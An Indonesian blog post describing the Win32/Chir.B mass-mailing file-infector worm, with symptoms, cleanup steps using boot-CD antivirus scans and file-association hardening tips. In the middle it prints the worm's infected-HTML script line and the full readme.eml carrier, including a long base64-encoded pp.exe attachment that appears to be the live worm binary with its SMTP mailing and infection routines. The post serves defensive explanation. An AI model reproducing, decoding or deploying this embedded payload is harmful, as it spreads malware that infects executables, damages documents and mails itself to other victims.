Virus win32chir.b /worm ( Virus amplop )

Saya akan sedikit mengulang / meng-ulas kembali Virus yang bernama worm win32/chir.b

Karena Virus ini sangat berbahaya / merusak terhadap dokumen , biarpun tidak secara langsung.Virus ini adalah jenis Virus infektor , yang akan meng-infeksi jenis file exe , scr , htm , html….. sehingga bila kita membuka file dokumen ( misalnya: word , excel , powerpoint ) maka dokumen yang telah terlanjur terbuka tadi akan rusak , sebab  aplikasi yang dibuat untuk membuka file dokumen tersebut telah terinfeksi Virus . Dan sampai sekarang belum ada cara untuk mengembalikan dokumen tersebut kembali normal…

Saran: jangan sekali-kali membuka file dokumen anda dikomputer yang telah terinfeksi Virus win32/chir.b , bila tidak ingin dokumen anda rusak / hilang.

Ciri-ciri Komputer yang ter-infeksi :

  1. Banyak aplikasi yang tidak bisa dijalankan / eksekusi , atau bisa berjalan tapi lemot / lambat dan tidak berjalan dengan semestinya.
  2. akan terdapat banyak file bericon amplop / email , kalau dilihat dengan seksama bernama readme.eml hampir disemua folder.
  3. Disemua file htm / html bila kita buka dengan notepad , akan terlihat  terinfeksi / ditambahkan beberapa baris script seperti dibawah ini:

<html><script language=”JavaScript”>window.open(“readme.eml”, null,”resizable=no,top=6000,left=6000″)</script></html>
<html><script language=”JavaScript”>window.open(“readme.eml”, null,”resizable=no,top=6000,left=6000″)</script></html>
<html><script language=”JavaScript”>window.open(“readme.eml”, null,”resizable=no,top=6000,left=6000″)</script></html>
<html><script language=”JavaScript”>window.open(“readme.eml”, null,”resizable=no,top=6000,left=6000″)</script></html>
<html><script language=”JavaScript”>window.open(“readme.eml”, null,”resizable=no,top=6000,left=6000″)</script></html>

4.  Bila kita membuka browser firefox ( misalnya ) , akan diikuti terbukanya file readme.eml  , karena didalam file  readme.eml terdapat juga script html  yang berfungsi untuk eksekusi file javascript , sehingga bisa memasukkan infektor yang terdapat didalam file readme.eml tersebut. yaitu : pp.exe

Cara mengatasinya / membersihkan Virus win32/chir.b :

  1. Karena Win32/chir.b adalah Virus infektor , otomatis semua file yang dibuka / start akan terinfeksi . jadi hampir tidak mungkin membersihkan dari system yang sudah terinfeksi. Ibarat kita mencuci pakaian dengan air yang kotor…..Jadi cara yang paling aman adalah menggunakan windows Xp live CD / mini windows Xp yang ada di Hiren Boot CD.
  2. Setelah kita pilih booting dari CD hiren , pilih Mini Windows Xp dan tunggu sampai Muncul Windows xp-nya.Perlu diketahui , untuk bisa scan dengan normal memory RAM yang dibutuhkan minimal 512 Mb.
  3. Scan dengan NOD32 stand alone terbaru , yang sudah di download dari komputer yang tidak terinfeksi Virus.
  4. Scan semua Drive / partisi , menurut pengalaman pilih opsi di action / clean….>>> delete .maka cleaner akan meng-clean file yang terinfeksi ( exe, scr ) dan akan menghapus file readme.eml
  5. Setelah ter-scan semua restart komputer dan scan komputer dengan anti Virus yang bisa mendeteksi file htm / html yang terinfeksi , karena biarpun Virus sudah bersih , tapi file htm yang terinfeksi masih terasa mengganggu / karena setiap file htm dibuka akan ikut membuka / meng-eksekusi file readme.eml
  6. Saya menggunakan Virus yang menggunakan database clamav  misalnya : clamwin , atau bisa pakai clamav for win atau PCMAV yang telah digabung dengan Clamav.Atau anti Virus lain andalan anda…🙂

Sekedar info :

  1. file readme.eml:
HELO btamail.net.cn
MAIL FROM: imissyou@btamail.net.cn
RCPT TO:
DATA
FROM: SERVER@yahoo.com
TO:
SUBJECT: SERVER is comming!
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="#BOUNDARY#"

--#BOUNDARY#
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

--#BOUNDARY#
MIME-Version: 1.0
Content-Type: audio/x-wav; name="pp.exe"
Content-Transfer-Encoding: base64
Content-id: THE-CID

TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJ
BUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2luMzINCiQ
3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAtSzvggAAAAAAAAAA4AC
OgQsBAhkAAgAAAAYAAAAAAAAARAAAABAAAAAgAAAAAEAAABAAAAAC
AAABAAAAAAAAAAMACgAAAAAAAGAAAAAEAAAAAAAAAgAAAAAAEAAAI
AAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAADAAAE4AAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAQAAADAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ09ERQAAAAAAEAAAA
BAAAAACAAAABgAAAAAAAAAAAAAAAAAAIAAAYERBVEEAAAAAABAAAA
AgAAAAAgAAAAgAAAAAAAAAAAAAAAAAAEAAAMAuaWRhdGEAAAAQAAA
AMAAAAAIAAAAKAAAAAAAAAAAAAAAAAABAAADALnJlbG9jAAD8HQAA
AEAAAPwdAAAADAAAAAAAAAAAAAAAAAAAQAAA8AAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAw/8lMDBAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

//ge4AEAAAZoE+TVp18w+3fjwD/otveAPui10gA94zwIvWg8MEQIs
7A/roDwAAAEdldFByb2NBZGRyZXNzAF4zybEP/POmddqL8otdJAPe
D7cMQ4tdHAPeixyLA96B7PwAAACL/Im0JOAAAADoXgQAAIvpVv/T/
KuLzeL1iwQk6AsAAABVU0VSMzIuRExMAP/Qi/DoywYAAIvpVv/T/K
uLzeL1iwQk6A0AAABBRFZBUEkzMi5ETEwA/9CL8OgdBwAAi+lW/9P
8q4vN4vWLBCToCAAAAE1QUi5ETEwA/9CL8OhcBwAAi+lW/9P8q4vN
4vWLBCToDAAAAFdTT0NLMzIuRExMAP/Qi/DofAcAAIvpVv/T/KuLz
eL1i/ToEAAAAENoaW5lc2VIYWNrZXItMgBqAGoA/1YE/1YIC8B0As
zp/1YMagFQ/1YQ6GgBAACL9OgNAAAAi/RoYOoAAP9WROvv6VnolRQ
AAOglCgAAjYIeAQAAiQLoDAoAAI1CLZCQkIkC6GEIAADo+gkAAI1C
O5CQkIkC6HYIAADo9AkAAI2ClwAAAIkC6NsJAACNQi2QkJCJAugwC
AAA6MkJAACNQjuQkJCJAuhFCAAAi4boAAAAaGDqAABQ/1Zkg/j/dF
xW6EoAAABe6DsAAABOZXQgU2VuZCAqIE15IGdvZCEgU29tZSBvbmU
ga2lsbGVkIENoaW5lc2VIYWNrZXItMiBNb25pdG9yAFhqAFD/VhDr
nFnoyRMAAOhaAQAA6egAAAAAX4uGjAAAAImH/RUAAIuGlAAAAImHE
RYAAIuGmAAAAImHJhYAAItGRImHZhYAAI2HvBUAAFBUagBQUGoAag
D/VnSL2FiLhugAAABoYOoAAFD/VmRQagBT/1Z4WIP4/3QCzOlW6AM
AAABe69lZ6E0TAADo3gAAAOlZ6EETAACB7AABAABU6OwGAACL/GoQ
V/9WcIP4/3Qdi9johRMAAGoAagBT/1Y8U+hjCwAAi/xqB1f/VihQV
OguAAAAU09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudF
ZlcnNpb25cUnVuAGgCAACA/5agAAAAW4vE6AgAAABSdW5vbmNlAFl
oAAEAAFBqAWoAUVP/lqQAAADoAAAAAF+LhqgAAACJh4QVAACLhqQA
AACJh64VAACLhqwAAACJh5kVAACNh10VAABQVGoAU1BqAGoA/1Z0W
DPAiYboAAAAgewAAQAAVOgNBgAA6AAAAABfi0ZQiYd7FQAAi0ZkiY
eXFQAAi0YQiYeyFQAAi0ZIC8B0b2oBagD/0IuW4AAAAA+3WjwD2ou
LBAEAAItrVCvNgfkAAgAAckgD6o2XchUAAGpOkJCQkFVS6GQVAACN
TU6QkJCL1GgAAQAAUVLoUBUAAP9WTFBUagBQVWoAagD/VlyJhugAA
ABYaPQBAAD/VkTM6WoAagD/lowAAABQVFD/logAAABqAGj/Dx8A/1
ZQC8B0b4vYakBoABAAAGgAAgAAagBT/1ZoC8B0S4vojZdyFQAAUFR
qTpCQkJBSVVP/VlRYg/hOkJCQdSyL1I1NTpCQkFBUaAABAABSUVP/
VlT/VkxUagBQVWoAagBT/1ZYiYboAAAAWFP/VmBo9AEAAP9WRMzpW
IvM6A4AAABHZXRTeXN0ZW1UaW1lAOgRAAAAR2V0Q29tcHV0ZXJOYW
1lQQDoFAAAAFdpZGVDaGFyVG9NdWx0aUJ5dGUA6BAAAABUZXJtaW5
hdGVUaHJlYWQA6A0AAABDcmVhdGVUaHJlYWQA6AgAAABfbGNyZWF0
AOgUAAAAR2V0U3lzdGVtRGlyZWN0b3J5QQDoDwAAAFZpcnR1YWxBb
GxvY0V4AOgUAAAAV2FpdEZvclNpbmdsZU9iamVjdADoDAAAAENsb3
NlSGFuZGxlAOgTAAAAQ3JlYXRlS2VybmVsVGhyZWFkAOgTAAAAQ3J
lYXRlUmVtb3RlVGhyZWFkAOgTAAAAV3JpdGVQcm9jZXNzTWVtb3J5
AOgMAAAAT3BlblByb2Nlc3MA6BQAAABHZXRDdXJyZW50UHJvY2Vzc
0lkAOgXAAAAUmVnaXN0ZXJTZXJ2aWNlUHJvY2VzcwDoBgAAAFNsZW
VwAOgIAAAAX2xjbG9zZQDoCAAAAF9sbHNlZWsA6AgAAABfbHdyaXR
lAOgHAAAAX2xyZWFkAOgHAAAAX2xvcGVuAOgMAAAAU2V0RmlsZVRp
bWUA6BMAAABTZXRGaWxlQXR0cmlidXRlc0EA6AoAAABGaW5kQ2xvc
2UA6A4AAABGaW5kTmV4dEZpbGVBAOgPAAAARmluZEZpcnN0RmlsZU
EA6BUAAABTZXRDdXJyZW50RGlyZWN0b3J5QQDoDgAAAEdldERyaXZ
lVHlwZUEA6AgAAABXaW5FeGVjAOgQAAAAR2V0Q29tbWFuZExpbmVB
AOgNAAAAR2V0TGFzdEVycm9yAOgNAAAAQ3JlYXRlTXV0ZXhBAOgNA
AAATG9hZExpYnJhcnlBACvMwekC/+DpWIvM6AoAAAB3c3ByaW50Zk
EA6A0AAABTZW5kTWVzc2FnZUEA6AoAAABHZXRXaW5kb3cA6AwAAAB
NZXNzYWdlQm94QQDoDAAAAEZpbmRXaW5kb3dBAOgZAAAAR2V0V2lu
ZG93VGhyZWFkUHJvY2Vzc0lkACvMwekC/+DpWIvM6BgAAABSZWdOb
3RpZnlDaGFuZ2VLZXlWYWx1ZQDoEQAAAFJlZ1F1ZXJ5VmFsdWVFeE
EA6A8AAABSZWdTZXRWYWx1ZUV4QQDoDAAAAFJlZ09wZW5LZXlBACv
MwekC/+DpWIvM6A4AAABXTmV0Q2xvc2VFbnVtAOgSAAAAV05ldEVu
dW1SZXNvdXJjZUEA6A4AAABXTmV0T3BlbkVudW1BACvMwekC/+DpW
IvM6AUAAAByZWN2AOgMAAAAY2xvc2Vzb2NrZXQA6AcAAABzb2NrZX
QA6AgAAABjb25uZWN0AOgOAAAAZ2V0aG9zdGJ5bmFtZQDoBgAAAGh
0b25zAOgFAAAAc2VuZADoCwAAAFdTQUNsZWFudXAA6AsAAABXU0FT
dGFydHVwACvMwekC/+DpWIvM6AwAAADHubHQwO666da+IQDoEAAAA
Mily/vC6LXEt6jC1rmmIQDoEwAAALe0ttTQsL3MLLPnydC/xtGnIQ
DoDAAAALTytbmxvsCttcchAOgQAAAAz/LTotDbzfXOsNbC0uIhAOg
OAAAAt7S21LDUyKjW99LlIQDoDgAAAMrAvefQ6NKqus3GvSEA6AwA
AADJ57vh1vfS5brDIQArzP/g6cgAAABgi30IaAABAABX/1ZsA/joD
QAAAFxydW5vdWNlLmV4ZQBeuRAAAAD886RhycIEAOm5GAAAALpDOl
wAUVJU/1YUg/gCcguD+AV0BlToqAAAAFpCWeLlw+kz/+g4AAAA6Ck
AAADoGgAAAOgLAAAAi0cUUOiCAAAAw+lXagHoIAAAAMPpV2oC6BYA
AADD6VdqAugMAAAAw+lXagLoAgAAAMPpyAAAAGBQVP91DP91CGoBa
gL/lrAAAABbC8B1NoHsABAAAIvUagGLxGgAEAAAVFJQU/+WtAAAAF
lZC8B1CIv8/1UQ697pU/+WuAAAAIHEABAAAGHJwgwA6cgAAABgi0U
IiwANICAgID13aW5udHY9d2luZHRv/3UI/1YYC8B0Zf91COhjAAAA
gewAEAAAxwQkKi4qAIvEVFD/VhyL2IP4/3QxVFP/ViALwHQkjVQkL
IsEJIPgEHQPiwI8LnTlUuiV////693pVOhAAAAA69TpU/9WJMcEJC
4uAABU/1YYgcQAEAAAYcnCBADpyAAAAGDoBgAAAGHJwgQA6VnopQo
AAOgpAAAA/3UI/xLM6cgAAABg6AYAAABhycIEAOlZ6IMKAADoEwAA
AP91CP8SzOnoBAAAANlPQABaw+noBAAAANZQQABaw+nIAAAAi0UIQ
IA4AHX6i0D8DSAgICDJwgQA6cgAAABqCv9WRMnCBADpyAAAAIHsAA
EAAFTo3v3//4v8agBX/1Ywg/j/dECL2LgAAQAAUIvEUFf/loAAAAB
YA8fHAC5lbWzHQAQAAAAAagBX/1Zwg/j/dA+L+FdTagDolQQAAFf/
VkBT/1ZAgcQAAQAAycIEAOnIAAAAi30IjV8sU+hg////PS53YWJ0I
T0uYWRjdCU9ci5kYnQePS5kb2N0Fz0ueGxzdBDJwgQA6VPovQMAAM
nCBADpU+gVAwAAgewAAQAAVP+WhAAAAGaLRCQGgcQAAQAAZj0BAHU
bagJT/1Ywg/j/dBCL2Gg0EgAAVFP/VjhT/1ZAycIEAOnIAAAAi30I
jV8sU+jZ/v//PS5leGV0Uz0uc2NydEw9Lmh0bXQLPWh0bWx0BMnCB
ABqAFP/VihqAlP/VjCD+P90HIvYU+hcAAAAjUcEjU8MjVcUUlFQU/
9WLFP/VkCNXyz/N1P/VijJwgQAagBT/1YoagJT/1Ywg/j/dByL2FP
oFQEAAI1HBI1PDI1XFFJRUFP/VixT/1ZAjV8s/zdT/1YoycIEAOnI
AAAAYIHsAAEAAFToSfz//4vEagBQ/1YwgcQAAQAAg/j/D4TFAAAAi
9joCwAAAHJlYWRtZS5lbWwAWGoAUP9WcIP4/w+EnwAAAIv4V1NqAO
gBAwAAV/9WQIt9CGoCagBX/1Y86HgAAAANCjxodG1sPjxzY3JpcHQ
+PC9odG1sPgBYanhQV/9WOFP/VkBhycIEAOnIAAAAYIHsABAAAIv8
aAAQAABX/3UI/1Y0D7dHPAP4O/0Ph9QAAABmgT9QRQ+FyQAAAI2f+
AAAAA+3TwZJg8Mo4vs73Q+HsQAAAItHKCtDDHIjA0MUagBQ/3UI/1
Y8UIvEagRQ/3UI/1Y0WGY9YOgPhIYAAACBSyQAAADgagJqAP91CP9
WPIP4/3RwUAX8GQAAK0MUiUMQi1MIO8JyFolDCItPOEkDwQPR99Ej
wSPRK8IBR1BZK0sUA0sMh08oA0806AAAAABfge8jDwAAiQ+D7xFo/
BkAAFf/dQj/VjiD+P90GGoAagD/dQj/
+v//i/xqAFf/VjCD+P90D4vYU/91COjXAQAAU/9WQIHEAAEAAGHJwg
QAyAAAAGBqAP91CP9WMIP4/w+EggAAAIvYgewAAQAAi/wz0lJQi8Rq
AVBT/1Y0WVoLwHRbi8SDwCA7+HfigPlAdEWA+S50PID5MHIPgPk5cj
iA+UFyBYD5fnIuM8D8qoD+AXW7gPoBcrYr/IP/BnKvigQkPEB0qDwu
dKRU6Ej////rnP7C6wL+xorB/KrrlFP/VkCBxAABAABhycIEAMgAAA
BgagD/dQj/VjCD+P90cIvYgewAAQAAi/xoAAEAAFdT/1Y0PQABAAB1
S4tHYGoAUFP/VjyLT2SB+QAQAAB3NlFqRFdT/1Y0gewAAQAAi8RqAG
oAaAABAABQav9XaAACAABqAP9WfFTovP7//4HEAAEAAFniyoHEAAEA
AFP/VkBhycIEAMgEAABgiWX8gewAEAAAi/z/dQhX6AoCAABQV/91EP
9WOIHsABAAAIkEJIHsABAAAIkEJIHsABAAAIkEJIv8aAAwAABX/3UM
/1Y0g/j/dEiL1IHsABAAAIkEJIHsABAAAIkEJIHsABAAAIkEJIHsAB
AAAIkEJIv8V1BS6AYEAABQV/91EP9WOMcEJA0KDQpqBFf/dRD/VjiL
ZfxhuAEAAADJwgwAyAgAAGCJZfzHRfgAAAAAgewAEAAAi/xUaAEBAA
D/lrwAAAALwA+FSQEAAGoAagFqAv+W1AAAAIP4/w+ELgEAAIvYZscH
AgBqGf+WyAAAAGaJRwLoDwAAAGJ0YW1haWwubmV0LmNuAP+WzAAAAA
vAD4TyAAAAi0AQiwCJRwRqEFdT/5bQAAAAg/j/D4TXAAAA/3UIV+jm
AAAAagBQV1P/lsQAAABooA8AAP9WRIHsABAAAIkEJIHsABAAAIkEJI
HsABAAAIkEJIv8aAAwAABX/3UM/1Y0g/j/D4SJAAAAgewAEAAAiQQk
gewAEAAAiQQkgewAEAAAiQQkgewAEAAAiQQki9RSUFfo1QIAAIv8ag
BQV1P/lsQAAABooA8AAP9WROgFAAAADQouDQpYagBqBVBT/5bEAAAA
aKAPAAD/VkToBgAAAFFVSVQNClhqAGoGUFP/lsQAAABooA8AAP9WRM
dF+AEAAABT/5bYAAAA/5bAAAAAi2X8YYtF+MnCCADIBAAAYLgAAQAA
K+CL1FBUUv+WgAAAAFjoHQIAAEhFTE8gYnRhbWFpbC5uZXQuY24NCk
1BSUwgRlJPTTogaW1pc3N5b3VAYnRhbWFpbC5uZXQuY24NClJDUFQg
VE86ICVzDQpEQVRBDQpGUk9NOiAlc0B5YWhvby5jb20NClRPOiAlcw
0KU1VCSkVDVDogJXMgaXMgY29tbWluZyENCk1JTUUtVmVyc2lvbjog
MS4wDQpDb250ZW50LXR5cGU6IG11bHRpcGFydC9taXhlZDsgYm91bm
Rhcnk9IiNCT1VOREFSWSMiDQoNCi0tI0JPVU5EQVJZIw0KQ29udGVu
dC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtVHJhbnNmZXItRW5jb2
Rpbmc6IHF1b3RlZC1wcmludGFibGUNCg0KPGh0bWw+PEhFQUQ+PC9I
+PC9pZnJhbWU+PC9ib2R5PjwvaHRtbD4NCg0KLS0jQk9VTkRBUlkjD
QpNSU1FLVZlcnNpb246IDEuMA0KQ29udGVudC1UeXBlOiBhdWRpby9
4LXdhdjsgbmFtZT0icHAuZXhlIg0KQ29udGVudC1UcmFuc2Zlci1Fb
mNvZGluZzogYmFzZTY0DQpDb250ZW50LWlkOiBUSEUtQ0lEDQoNCgB
Yi/xX/3UMV/91DFD/dQj/lpwAAACL54lF/IHEAAEAAGGLRfzJwggAy
AQAAGDHRfwAAAAA6EEAAABBQkNERUZHSElKS0xNTk9QUVJTVFVWV1h
ZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvA
F6LfRCLVQzB4gMz2zPAuQYAAADR4FP/dQjoMAAAAEp0DUPi74oEBvy
q/0X8695J0+CKBAb8qv9F/NHpAU38sD3886oywKphi0X8ycIMAMgAA
ABRUlaLdQiLTQyL0cHqA4oUFvbRgOEH0uqA4gEKwl5aWcnCCABYUeg
DAAAA6zrpZGf/NgAAZGeJJgAA6BwAAAD/Moki/+DpWOgPAAAAiyKPA
mRnjwYAAFlZ/+Dp6AQAAACI/hIAWsPpyAAAAOgIAAAA6NH/////4el
Zi0UQiYi4AAAAM8DJwhAA6GcBAABNWlAAAQIAAwQAAQ8AAf//AAK4A
AdAAAEaACIBAAK6EAABDh+0Cc0huAFMzSGQkFRoaXMgcHJvZ3JhbSB
tdXN0IGJlIHJ1biB1bmRlciBXaW4zMg0KJDcAiFBFAAJMAQQAAbUs7
4IACOAAAY6BCwECGQABAgADBgAHEAADEAADIAAEQAACEAADAgACAQA
HAwABCgAGUAADBAAGAgAFEAACIAAEEAACEAAGEAAMMAACTgAcQAACD
ABTQ09ERQAFEAADEAADAgADBgAOIAACYERBVEEABRAAAyAAAwIAAwg
ADkAAAsAuaWRhdGEAAxAAAzAAAwIAAwoADkAAAsAucmVsb2MAAxAAA
0AAAwIAAwwADkAAAlAA/wD/AP8Aa8P/JTAwQAD/AP8A/wD9KDAACjg
wAAIwMAAWRjAABkYwAAZLRVJORUwzMi5kbGwABFNsZWVwAP8AtRAAA
gwAAwMwAP8A/wD/APkAAF+KB0cKwHQNUIvEagFQU/9WOFjr7A+2D0f
jEVFQi8RqAVBT/1Y4WFni8evVw+nIAAAAgewAAQAAM/aL/Ga4DQq5D
AAAAPzzZqvo9vD//4sUtAPhigJC/KoKwHX36AkAAAC3osvNz/vPogD
oBAAAAJHlQn5YagD/EAvAdFeL2OgEAAAAZbxBflhqBVP/EAvAdEKL2
OgEAAAAt/NCfl+B7AAQAABUaAAQAABqDVP/F4HEABAAAAvAdRtUaAA
QAABqDFP/F0aD5gd1CoHEAAEAAMnCBADoBAAAAEIkgHxYaPQBAAD/E
OlR////6cgAAACLXQiB7AABAACL/OgIAAAAUnVub25jZQBeaAABAAD
oBAAAAIN43XdYVFdqAGoAVlP/EFjoBAAAAGbZ3XdYagBqAGoEagBT/
xDoBAAAAOfr3XdYaAABAABXagFqAFZT/xDr0enIAAAA6AQAAADJCIN
8WP91CGoAaP8PHwD/EAvAdCyL2OgEAAAAICWAfFhq/1P/EOgAAAAAW
YPBGpCQkOgEAAAAtRKGfFhqAVH/EMnCBADpyAAAAGBQDwFMJP5Yg8A
YixiLUAToCwAAAGCJGIlQBPzzpGHP+maPAGaPQAaLdQiLfQyLTRDM+
2HJwgwA6cgAAABgi0UIagBQUGoA/5aQAAAAYcnCBAAAAAAAAAAAAMM
AAAAAAAAAAAAAAAAAAAA=

Virus ini uniknya , menggabungkan berbagai teknik 1. html / htm ( yang dibuka dengan browser ) ,  2. eml ( yang dibuka oleh outlook express ) , 3. scr ( screen saver ),  4. exe ( aplikasi ) , 5.Autorun.inf ( autorun Windows ).

2. Hampir semua komputer yang tidak di maintenance / setting dengan settingan lebih akan langsung terinfeksi Virus ini.

Tip’s & trik’s :

Untuk menjaga agar komputer kita aman dari berbagai Virus , ada beberapa settingan yang harus kita lakukan . Dengan tujuan agar Virus tidak langsung dieksekusi / tereksekusi :

  1. Rubah assosiasi file eml menjadi txtfile :    “assoc eml=txtfile”        Tujuannya : Bila file readme.eml dieksekusi akan terbuka dengan notepad.
  2. Rubah assosiasi file  htm / html menjadi txtfile: “assoc htm=txtfile ,  assoc html=txtfile”    Tujuannya : file htm yang terinfeksi bila dieksekusi tidak langsung memanggil file readme.eml tapi bila file htm tersebut tidak ada script seperti contoh diatas bila kita ingin membuka bisa menggunakan open with : internet explorer atau browser lainnya.
  3. Rubah assosiasi file js , jse , vbs , vbe , wsf menjadi txtfile , tujuannya : agar bila ada script    js  atau vbs akan terbuka dengan notepad.
  4. Bila ada email / atau file readme.eml tereksekusi , jangan sampai klik file pp.exe  ( attachment file ) . karena file tersebut adalah infektor untuk file exe.
  5. file  htm / html yang terinfeksi oleh clamav / clamwin terdeteksi sebagai Virus htm.nimda , ini membuktikan , bahwa pembuat Virus mengupdate / menyempurnakan / menggunakan kelebihan Virus NIMDA dalam  menginfeksi komputer korban.

Sekali lagi saya ingatkan , bersihkan komputer anda dari Virus win2/chir.b . Sebelum anda membuka file dokumen , bila ingin file dokumen anda aman dan tidak rusak…….

Tentang Mpu-Elcom

Sholatku , ibadahku , hidupku , dan matiku , ku persembahkan untuk Allah tuhan Alam semesta...
Pos ini dipublikasikan di Virus dan tag , , , . Tandai permalink.

5 Balasan ke Virus win32chir.b /worm ( Virus amplop )

  1. Teresita Engelke berkata:

    Many thanks for the great posting. I am glad I have taken the time to see this.

  2. john berkata:

    This is a really good read for me, Must admit that you are one of the best bloggers I ever saw.Thanks for posting this informative article.

  3. Stacy Breutzmann berkata:

    This weblog appears to get a great deal of visitors. How do you promote it? It offers a nice unique spin on things. I guess having something authentic or substantial to say is the most important thing.

  4. Virus paling menyebalkan,tiap di hapus ada lagi…apa ya removal toolsnya yg bagus?

  5. Mpu-Elcom berkata:

    @pranantabalicarrental: untuk Virus Win32 chir.b bisa dibersihkan dengan menggunakan tool RMCHIR silakan download dan simpan dalam bentuk rar archive di komputer yang bersih dari virus lalu bisa digunakan untuk membersihkan khusus virus worm chir ( readme.eml )

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s